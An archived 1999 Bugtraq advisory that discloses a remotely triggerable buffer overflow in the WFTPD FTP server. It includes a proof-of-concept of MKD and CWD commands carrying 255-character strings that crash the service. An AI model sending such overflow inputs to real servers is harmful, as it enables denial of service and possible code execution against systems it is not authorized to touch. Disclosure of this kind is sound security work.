[12371] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

WFTPD v2.40 FTPServer remotely exploitable buffer overflow

daemon@ATHENA.MIT.EDU (Luciano Martins)
Thu Oct 28 14:48:44 1999

Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id:  <NCBBKFKDOLAGKIAPMILPOEFBCAAA.luck@ussrback.com>
Date:         Thu, 28 Oct 1999 06:07:55 -0300
Reply-To: Luciano Martins <luck@USSRBACK.COM>
From: Luciano Martins <luck@USSRBACK.COM>
X-To:         BUGTRAQ <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM

We found in the WFTPD v2.34,v2.40 Server and earlier a vulnerable to
remotely exploitable buffer overflow. This can result in a denial of service
and at worst in arbitrary code being executed on the system.

The vulnerabilities are the conjunction of two large commands the MKD and
CWD  if they are passed an argument a string exact of  255 characters, If
this 2 large commands are passed in order program crash.
Tested in: Windows 98 / Windows Nt

Example:

First command

MKD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Second command

CWD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Crash.....Overflow.

Luck Martins

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
WWW.USSRBACK.COM


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[12371] in bugtraq

WFTPD v2.40 FTPServer remotely exploitable buffer overflow

daemon@ATHENA.MIT.EDU (Luciano Martins)Thu Oct 28 14:48:44 1999

daemon@ATHENA.MIT.EDU (Luciano Martins)
Thu Oct 28 14:48:44 1999